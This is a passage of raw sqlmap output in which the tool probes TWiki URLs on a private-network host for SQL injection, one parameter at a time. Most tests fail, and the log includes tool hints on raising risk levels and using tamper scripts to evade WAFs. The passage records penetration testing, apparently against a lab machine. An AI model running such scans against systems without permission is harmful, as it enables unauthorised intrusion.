[19:07:00] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[19:07:00] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[19:07:07] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[19:07:15] [WARNING] GET parameter 'rev1' is not injectable
[19:07:15] [INFO] testing if GET parameter 'rev2' is dynamic
[19:07:15] [INFO] confirming that GET parameter 'rev2' is dynamic
[19:07:15] [INFO] GET parameter 'rev2' is dynamic
[19:07:15] [WARNING] heuristic (basic) test shows that GET parameter 'rev2' might not be injectable
[19:07:15] [INFO] heuristic (XSS) test shows that GET parameter 'rev2' might be vulnerable to XSS attacks
[19:07:15] [INFO] testing for SQL injection on GET parameter 'rev2'
[19:07:15] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[19:07:16] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[19:07:23] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[19:07:24] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[19:07:25] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[19:07:25] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[19:07:26] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[19:07:29] [INFO] testing 'MySQL inline queries'
[19:07:32] [INFO] testing 'PostgreSQL inline queries'
[19:07:35] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[19:07:38] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[19:07:38] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[19:07:39] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[19:07:39] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[19:07:40] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[19:07:40] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[19:07:41] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[19:07:42] [INFO] testing 'Oracle AND time-based blind'
[19:07:42] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[19:07:50] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[19:07:57] [WARNING] GET parameter 'rev2' is not injectable
[19:07:57] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
URL 80:
GET http://192.168.1.113:80/twiki/bin/view/TWiki/TWikiDocumentation?rev=1.43
do you want to test this URL? [Y/n/q]
> Y
[19:07:57] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/view/TWiki/TWikiDocumentation?rev=1.43'
[19:07:57] [INFO] testing connection to the target URL
[19:08:00] [INFO] testing if the target URL is stable
[19:08:01] [WARNING] target URL is not stable. sqlmap will base the page comparison on a sequence matcher. If no dynamic nor injectable parameters are detected, or in case of junk results, refer to user's manual paragraph 'Page comparison' and provide a string or regular expression to match on
how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] C
[19:08:01] [INFO] testing if GET parameter 'rev' is dynamic
[19:08:03] [INFO] confirming that GET parameter 'rev' is dynamic
[19:08:04] [INFO] GET parameter 'rev' is dynamic
[19:08:04] [WARNING] heuristic (basic) test shows that GET parameter 'rev' might not be injectable
[19:08:04] [INFO] heuristic (XSS) test shows that GET parameter 'rev' might be vulnerable to XSS attacks
[19:08:04] [INFO] testing for SQL injection on GET parameter 'rev'
[19:08:04] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[19:08:04] [WARNING] reflective value(s) found and filtering out
[19:08:14] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[19:08:15] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[19:08:15] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[19:08:16] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[19:08:16] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[19:08:17] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[19:08:17] [INFO] testing 'MySQL inline queries'
[19:08:17] [INFO] testing 'PostgreSQL inline queries'
[19:08:17] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[19:08:18] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[19:08:18] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[19:08:19] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[19:08:19] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[19:08:19] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[19:08:20] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[19:08:21] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[19:08:23] [INFO] testing 'Oracle AND time-based blind'
[19:08:24] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[19:08:24] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[19:09:02] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[19:09:40] [WARNING] GET parameter 'rev' is not injectable
[19:09:40] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
[19:09:40] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/rdiff/TWiki/TWikiDocumentation?rev1=1.43&rev2=1.42'
[19:09:40] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/view/TWiki/TWikiDocumentation?rev=1.42'
URL 81:
GET http://192.168.1.113:80/twiki/bin/oops/TWiki/TWikiDocumentation?template=oopsmore&param1=1.44&param2=1.44
do you want to test this URL? [Y/n/q]
> Y
[19:09:40] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/oops/TWiki/TWikiDocumentation?template=oopsmore&param1=1.44&param2=1.44'
[19:09:40] [INFO] testing connection to the target URL
[19:09:40] [INFO] testing if the target URL is stable
[19:09:41] [WARNING] target URL is not stable. sqlmap will base the page comparison on a sequence matcher. If no dynamic nor injectable parameters are detected, or in case of junk results, refer to user's manual paragraph 'Page comparison' and provide a string or regular expression to match on
how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] C
[19:09:41] [INFO] testing if GET parameter 'template' is dynamic
[19:09:41] [INFO] confirming that GET parameter 'template' is dynamic
[19:09:41] [INFO] GET parameter 'template' is dynamic
[19:09:41] [INFO] heuristics detected web page charset 'ascii'
[19:09:41] [WARNING] heuristic (basic) test shows that GET parameter 'template' might not be injectable
[19:09:41] [INFO] heuristic (XSS) test shows that GET parameter 'template' might be vulnerable to XSS attacks
[19:09:41] [INFO] testing for SQL injection on GET parameter 'template'
[19:09:41] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[19:09:41] [WARNING] reflective value(s) found and filtering out
[19:09:42] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[19:09:42] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[19:09:43] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[19:09:43] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[19:09:44] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[19:09:44] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[19:09:44] [INFO] testing 'MySQL inline queries'
[19:09:44] [INFO] testing 'PostgreSQL inline queries'
[19:09:44] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[19:09:45] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[19:09:45] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[19:09:45] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[19:09:46] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[19:09:46] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[19:09:47] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[19:09:47] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[19:09:48] [INFO] testing 'Oracle AND time-based blind'
[19:09:48] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[19:09:48] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[19:09:53] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[19:09:57] [WARNING] GET parameter 'template' is not injectable
[19:09:57] [INFO] testing if GET parameter 'param1' is dynamic
[19:09:57] [WARNING] GET parameter 'param1' does not appear dynamic
[19:09:58] [WARNING] heuristic (basic) test shows that GET parameter 'param1' might not be injectable
[19:09:58] [INFO] heuristic (XSS) test shows that GET parameter 'param1' might be vulnerable to XSS attacks
[19:09:58] [INFO] testing for SQL injection on GET parameter 'param1'
[19:09:58] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[19:09:59] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[19:09:59] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[19:10:00] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[19:10:01] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[19:10:01] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[19:10:02] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[19:10:02] [INFO] testing 'MySQL inline queries'
[19:10:02] [INFO] testing 'PostgreSQL inline queries'
[19:10:02] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[19:10:02] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[19:10:03] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[19:10:03] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[19:10:04] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[19:10:04] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[19:10:05] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[19:10:06] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[19:10:06] [INFO] testing 'Oracle AND time-based blind'
[19:10:07] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[19:10:15] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[19:10:23] [WARNING] GET parameter 'param1' is not injectable
[19:10:23] [INFO] testing if GET parameter 'param2' is dynamic
[19:10:23] [WARNING] GET parameter 'param2' does not appear dynamic
[19:10:23] [WARNING] heuristic (basic) test shows that GET parameter 'param2' might not be injectable
[19:10:23] [INFO] testing for SQL injection on GET parameter 'param2'
[19:10:23] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[19:10:25] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[19:10:25] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[19:10:26] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[19:10:26] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[19:10:27] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[19:10:28] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[19:10:28] [INFO] testing 'MySQL inline queries'
[19:10:28] [INFO] testing 'PostgreSQL inline queries'
[19:10:28] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[19:10:28] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[19:10:29] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[19:10:29] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[19:10:30] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[19:10:30] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[19:10:31] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[19:10:32] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[19:10:32] [INFO] testing 'Oracle AND time-based blind'
[19:10:33] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[19:10:40] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[19:10:48] [WARNING] GET parameter 'param2' is not injectable
[19:10:48] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
[19:10:48] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/view/Main/WebHome?rev=r1.20'
[19:10:48] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/rdiff/Main/WebHome?rev1=1.19&rev2=1.18'
[19:10:48] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/view/Main/WebHome?rev=1.18'
[19:10:48] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/oops/Main/WebHome?template=oopsmore&param1=1.20&param2=1.20'
URL 82:
GET http://192.168.1.113:80/twiki/bin/view/Main/WebHome?unlock=on
do you want to test this URL? [Y/n/q]
> Y
[19:10:48] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/view/Main/WebHome?unlock=on'
[19:10:48] [INFO] testing connection to the target URL
[19:10:49] [INFO] testing if the target URL is stable
[19:10:49] [WARNING] target URL is not stable. sqlmap will base the page comparison on a sequence matcher. If no dynamic nor injectable parameters are detected, or in case of junk results, refer to user's manual paragraph 'Page comparison' and provide a string or regular expression to match on
how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] C
[19:10:49] [INFO] testing if GET parameter 'unlock' is dynamic
[19:10:50] [WARNING] GET parameter 'unlock' does not appear dynamic
[19:10:50] [WARNING] heuristic (basic) test shows that GET parameter 'unlock' might not be injectable
[19:10:50] [INFO] testing for SQL injection on GET parameter 'unlock'
[19:10:50] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[19:10:52] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[19:10:52] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[19:10:53] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[19:10:54] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[19:10:55] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[19:10:55] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[19:10:55] [INFO] testing 'MySQL inline queries'
[19:10:56] [INFO] testing 'PostgreSQL inline queries'
[19:10:56] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[19:10:56] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[19:10:56] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[19:10:57] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[19:10:58] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[19:10:58] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[19:10:59] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[19:11:00] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[19:11:01] [INFO] testing 'Oracle AND time-based blind'
[19:11:02] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[19:11:02] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[19:11:11] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[19:11:21] [WARNING] GET parameter 'unlock' is not injectable
[19:11:21] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
URL 83:
GET http://192.168.1.113:80/twiki/bin/rename/Main/WebHome?currentwebonly=on
do you want to test this URL? [Y/n/q]
> Y
[19:11:21] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/rename/Main/WebHome?currentwebonly=on'
[19:11:21] [INFO] testing connection to the target URL
[19:11:21] [INFO] testing if the target URL is stable
[19:11:22] [INFO] target URL is stable
[19:11:22] [INFO] testing if GET parameter 'currentwebonly' is dynamic
[19:11:22] [WARNING] GET parameter 'currentwebonly' does not appear dynamic
[19:11:22] [WARNING] heuristic (basic) test shows that GET parameter 'currentwebonly' might not be injectable
[19:11:22] [INFO] testing for SQL injection on GET parameter 'currentwebonly'
[19:11:22] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[19:11:23] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[19:11:24] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[19:11:24] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[19:11:25] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[19:11:26] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[19:11:26] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[19:11:26] [INFO] testing 'MySQL inline queries'
[19:11:26] [INFO] testing 'PostgreSQL inline queries'
[19:11:27] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[19:11:27] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[19:11:27] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[19:11:28] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[19:11:28] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[19:11:29] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[19:11:30] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[19:11:30] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[19:11:31] [INFO] testing 'Oracle AND time-based blind'
[19:11:33] [INFO] GET parameter 'currentwebonly' seems to be 'Oracle AND time-based blind' injectable
it looks like the back-end DBMS is 'Oracle'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
for the remaining tests, do you want to include all tests for 'Oracle' extending provided level (1) and risk (1) values? [Y/n] Y
[19:11:33] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[19:11:33] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[19:11:47] [INFO] checking if the injection point on GET parameter 'currentwebonly' is a false positive
[19:11:48] [WARNING] false positive or unexploitable injection point detected
[19:11:48] [WARNING] GET parameter 'currentwebonly' is not injectable
[19:11:48] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
URL 84:
GET http://192.168.1.113:80/twiki/bin/search/Main/SearchResult?scope=text&web=all;&regex=on&search=Web *Home[^A-Za-z]
do you want to test this URL? [Y/n/q]
> Y
[19:11:48] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/search/Main/SearchResult?scope=text&web=all;&regex=on&search=Web *Home[^A-Za-z]'
custom injection marking character ('*') found in option '-u'. Do you want to process it? [Y/n/q] Y
[19:11:48] [INFO] testing connection to the target URL
[19:11:50] [INFO] testing if the target URL is stable
[19:11:50] [INFO] target URL is stable
[19:11:50] [INFO] testing if URI parameter '#1*' is dynamic
[19:11:51] [INFO] confirming that URI parameter '#1*' is dynamic
[19:11:52] [INFO] URI parameter '#1*' is dynamic
[19:11:52] [WARNING] heuristic (basic) test shows that URI parameter '#1*' might not be injectable
[19:11:53] [INFO] testing for SQL injection on URI parameter '#1*'
[19:11:53] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[19:11:54] [WARNING] reflective value(s) found and filtering out
[19:12:07] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[19:12:09] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[19:12:14] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[19:12:18] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[19:12:23] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[19:12:28] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[19:12:28] [INFO] testing 'MySQL inline queries'
[19:12:29] [INFO] testing 'PostgreSQL inline queries'
[19:12:33] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[19:12:34] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[19:12:34] [CRITICAL] considerable lagging has been detected in connection response(s). Please use as high value for option '--time-sec' as possible (e.g. 10 or more)
[19:12:37] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[19:12:42] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[19:12:46] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[19:12:50] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[19:12:55] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[19:13:00] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[19:13:07] [INFO] testing 'Oracle AND time-based blind'
[19:13:12] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[19:13:12] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[19:14:04] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[19:14:19] [WARNING] URI parameter '#1*' is not injectable
[19:14:19] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
URL 85:
GET http://192.168.1.113:80/twiki/bin/edit/Main/WebNotify?t=1441456882
do you want to test this URL? [Y/n/q]
> Y
[19:14:19] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/edit/Main/WebNotify?t=1441456882'
[19:14:19] [INFO] testing connection to the target URL
[19:14:20] [INFO] testing if the target URL is stable
[19:14:20] [INFO] target URL is stable
[19:14:20] [INFO] testing if GET parameter 't' is dynamic
[19:14:20] [WARNING] GET parameter 't' does not appear dynamic
[19:14:21] [WARNING] heuristic (basic) test shows that GET parameter 't' might not be injectable
[19:14:21] [INFO] testing for SQL injection on GET parameter 't'
[19:14:21] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[19:14:22] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[19:14:22] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[19:14:22] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[19:14:23] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[19:14:23] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[19:14:24] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[19:14:24] [INFO] testing 'MySQL inline queries'
[19:14:24] [INFO] testing 'PostgreSQL inline queries'
[19:14:24] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[19:14:24] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[19:14:24] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[19:14:25] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[19:14:25] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[19:14:26] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[19:14:26] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[19:14:27] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[19:14:27] [INFO] testing 'Oracle AND time-based blind'
[19:14:28] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[19:14:28] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[19:14:33] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[19:14:39] [WARNING] GET parameter 't' is not injectable
[19:14:39] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
URL 86:
GET http://192.168.1.113:80/twiki/bin/search/Main/SearchResult?scope=text&regex=on&search=Web *Notify[^A-Za-z]
do you want to test this URL? [Y/n/q]
> Y
[19:14:39] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/search/Main/SearchResult?scope=text&regex=on&search=Web *Notify[^A-Za-z]'
custom injection marking character ('*') found in option '-u'. Do you want to process it? [Y/n/q] Y
[19:14:39] [INFO] testing connection to the target URL
[19:14:40] [INFO] testing if the target URL is stable
[19:14:40] [INFO] target URL is stable
[19:14:40] [INFO] testing if URI parameter '#1*' is dynamic
[19:14:40] [WARNING] URI parameter '#1*' does not appear dynamic
[19:14:41] [WARNING] heuristic (basic) test shows that URI parameter '#1*' might not be injectable
[19:14:41] [INFO] testing for SQL injection on URI parameter '#1*'
[19:14:41] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[19:14:41] [WARNING] reflective value(s) found and filtering out
[19:14:42] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[19:14:42] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[19:14:42] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[19:14:43] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[19:14:43] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[19:14:44] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[19:14:44] [INFO] testing 'MySQL inline queries'
[19:14:44] [INFO] testing 'PostgreSQL inline queries'
[19:14:44] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[19:14:44] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[19:14:45] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[19:14:45] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[19:14:46] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[19:14:46] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[19:14:47] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[19:14:47] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[19:14:48] [INFO] testing 'Oracle AND time-based blind'
[19:14:48] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[19:14:48] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[19:14:54] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[19:15:01] [WARNING] URI parameter '#1*' is not injectable
[19:15:01] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
URL 87:
GET http://192.168.1.113:80/twiki/bin/view/Main/WebNotify?skin=print
do you want to test this URL? [Y/n/q]
> Y
[19:15:01] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/view/Main/WebNotify?skin=print'
[19:15:01] [INFO] testing connection to the target URL
[19:15:01] [INFO] testing if the target URL is stable
[19:15:02] [INFO] target URL is stable
[19:15:02] [INFO] testing if GET parameter 'skin' is dynamic
[19:15:02] [INFO] confirming that GET parameter 'skin' is dynamic
[19:15:03] [INFO] GET parameter 'skin' is dynamic
[19:15:03] [INFO] heuristics detected web page charset 'ascii'
[19:15:03] [WARNING] heuristic (basic) test shows that GET parameter 'skin' might not be injectable
